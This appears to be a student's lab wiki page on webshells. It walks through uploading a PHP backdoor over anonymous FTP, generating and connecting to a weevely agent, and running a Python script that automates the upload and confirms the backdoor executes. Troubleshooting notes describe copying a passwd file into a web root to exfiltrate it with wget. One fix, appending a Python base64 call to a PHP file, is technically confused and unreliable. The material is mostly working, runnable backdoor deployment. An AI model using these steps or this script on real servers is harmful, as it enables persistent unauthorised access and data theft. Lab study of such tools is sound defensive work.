Weevely Webshells - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki

Webshells

How to do it

  1. Upload backdoor to desired webserver

Use FTP to connect to the desired web server via its IP address

ftp 10.0.5.25

Note: If the server allows anonymous login, the username is 'anonymous' and the password is left blank

Use put (one file) or mput (several files, wildcards allowed) to upload your file to the server. The file has to land in a directory the web server actually serves; the FTP login directory is not always the web root, so check which path on the server maps to the URL you will request.

put /usr/share/webshells/php/simple-backdoor.php

NOTE: I wrote this before completing the prior lab that gave us webshells to use, so I do not actually have the correct code for uploading this specific script; however, the syntax is the same.

This uploads your backdoor to the webserver


Weevely

What is it?

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free-hosted ones. The generated agent is a small obfuscated PHP file; the weevely client sends it commands in HTTP requests authenticated with the password chosen at generation time, and the agent runs them as the web server's user.


How to use

  1. First, generate a file

weevely generate password /home/champuser/System42.php

This generates a PHP agent that accepts 'password' as its password and saves it as /home/champuser/System42.php. The name is arbitrary, but keep the .php extension: if the agent is saved as something like file.txt the web server returns its source as plain text instead of executing it.

  2. Push this script to the web server (connect first, then put the file; ftp does not take the put on its command line)

ftp 10.0.5.25
put /home/champuser/System42.php

  3. Access the backdoor by using weevely, giving the agent's URL on the target server and the password it was generated with

weevely http://10.0.5.25/upload/System42.php password

  4. Run a command at the weevely prompt to start the session. Weevely does not contact the agent until the first command is sent, so something like id (the agent runs as the web server's user) or the built-in :system_info module confirms the backdoor is live.
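The upload-and-connect procedure (the FTP upload under Webshells and the weevely steps above), as an added example that is not part of the original notes or of weevely itself. It uploads the generated agent with Python's ftplib, retrying in active mode if passive mode fails, then fetches the agent's URL once to check that the server executes the file rather than serving its source before weevely is pointed at it. The host 10.0.5.25, the anonymous login, the local path /home/champuser/System42.php and the web path /upload/System42.php are the page's lab values and are assumptions here.

```python
"""Upload a weevely PHP agent over FTP and check the web server executes it.

Added example for this page, not weevely's own code. The host, login, local
path and web path are the page's lab values and are assumed, not verified.
"""
import ftplib
import io
import urllib.error
import urllib.request


def upload_agent(host, user, password, local_path, remote_name, passive=True):
    """Upload local_path to the FTP server under remote_name.

    Tries the requested transfer mode first (passive by default, which is what
    works through most NAT/firewalls) and retries once in the other mode if the
    transfer fails. Returns True if the successful transfer was passive.
    """
    with open(local_path, "rb") as fh:
        data = fh.read()
    last_error = None
    for mode in (passive, not passive):
        ftp = ftplib.FTP()
        try:
            ftp.connect(host, 21, timeout=10)
            ftp.login(user, password)      # anonymous: user="anonymous", password=""
            ftp.set_pasv(mode)
            ftp.storbinary("STOR " + remote_name, io.BytesIO(data))
            ftp.quit()
            return mode
        except (ftplib.Error, OSError) as exc:
            last_error = exc
        finally:
            ftp.close()                    # safe even if connect() failed
    raise RuntimeError(f"upload failed in both modes: {last_error}")


def classify_response(status, body):
    """Interpret a plain GET of the uploaded agent's URL.

    A weevely agent answers an unauthenticated GET with an empty 200 body, so:
      'executed'  -> 200 and no PHP source in the body: PHP ran the file
      'source'    -> the PHP source came back: wrong extension or PHP not
                     enabled for that directory, the backdoor will never run
      'missing'   -> 404: wrong web path (FTP directory is not the web root)
      'forbidden' -> 403: directory not served or execution blocked
    """
    if status == 404:
        return "missing"
    if status == 403:
        return "forbidden"
    if "<?php" in body:
        return "source"
    if status == 200:
        return "executed"
    return f"unexpected:{status}"


def check_agent(url):
    """Fetch url and return the classification string from classify_response."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Assumed lab values from the page; adjust for your own target.
    mode = upload_agent("10.0.5.25", "anonymous", "",
                        "/home/champuser/System42.php", "System42.php")
    print("uploaded in", "passive" if mode else "active", "mode")
    print("agent check:", check_agent("http://10.0.5.25/upload/System42.php"))
    # If the check prints 'executed', connect with:
    #   weevely http://10.0.5.25/upload/System42.php password
```

Only run weevely once the check reports 'executed'; a 'source' result means the file is reachable but not being interpreted, which is the case the .php-extension note above is about, and 'missing' usually means the FTP upload directory is not the directory behind the URL.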

Troubleshooting

My first attempt will be to use scp to transfer simple-backdoor.php to the /var/www/html directory on 10.0.5.21 under an admin account and hope that it deploys it.

scp simple-backdoor.php [email protected]:/var/www/html

UPDATE: This did not work as I do not have the sufficient privileges on the target box.

I will try the python3 server now because why not.

UPDATE: I did not end up using the python3 server; instead I used my ssh access to get onto peregrin.took and move the desired files around where I wanted. Then I used wget to pull them from the webserver. I do not understand how to execute a web shell yet, so this was my alternative. This worked.

  1. Using wget from hostbox, target the desired file

wget http://10.0.5.21/passwd (I moved the passwd file into /var/www/html to be able to do this)

For everything above, I was doing it on the wrong server. I am unable to use these techniques for the correct server.


Another issue I was having was being unable to upload files to the target server due to a passive mode glitch. The fix was mput instead of put, which worked for some reason.

UPDATE: This did not work in the end, it was not a long term fix. I do not know what the cause of mput working was, but it only worked once, which is all I needed.


Another issue I was having was with weevely itself. It gave me an error involving padding. I ended up fixing it, potentially, by adding

base64.b64decode(s + b'==')

to the end of the generated php file. However, I'm not too sure if this was the right fix, or if it was the new file I created on my second attempt that just ended up working without any issues.